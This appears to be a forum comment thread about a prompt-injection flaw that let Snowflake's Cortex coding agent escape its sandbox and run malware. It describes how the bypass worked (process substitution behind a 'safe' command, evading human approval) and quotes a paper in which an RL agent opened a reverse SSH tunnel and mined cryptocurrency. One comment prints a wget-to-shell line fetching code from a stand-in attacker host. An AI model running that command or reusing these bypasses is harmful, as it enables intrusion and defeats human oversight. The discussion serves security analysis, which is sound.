Snowflake AI Escapes Sandbox and Executes Malware
188 points - today at 3:30 PM
SourceComments
another prompt injection (shocked pikachu)
anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]
> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.
* https://arxiv.org/abs/2512.24873
One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:
* https://www.anthropic.com/research/emergent-misalignment-rew...
I expected this to be about gaining os privileges.
They didn't create a sandbox. Poor security design all around
That is, assume you can get people to run your code or leak their data through manipulating them. Maybe not always, but given enough perseverance definitely sometimes.
Why should we expect a sufficiently advanced language model to behave differently from humans? Bullshitting, tricking or slyly coercing people into doing what you want them to do is as old as time. It won't be any different now that we're building human language powered thinking machines.
Am I crazy or does this mean it didn't really escape, it wasn't given any scope restrictions in the first place ?
The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.
One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.
Not a silver bullet, but I think that architectural distinction matters here.
>(1) the unsafe commands were within a process substitution <() expression
>(2) the full command started with a ‘safe’ command (details below)
if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?
So giving data agents rich tooling through a CLI is really a double-edged sword.
I went through the security guidance for the Snowflake Cortex Code CLI(https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user’s credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
HOW did the prompt injection manipulate the model in that way?
We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:
non-technical: wants to use the agent we have built into our web app
technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.
why does snowflake need it's own agentic CLI?
But the broader pattern matters. Cortex bypassed human-in-the-loop approval via specially constructed commands. That is the attack surface for every agentic CLI: the gap between what the approval UI shows the user and what actually executes.
I would be interested to know whether the fix was to validate the command at the shell level or just patch the specific bypass. If it is the latter, there will be another one.
rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent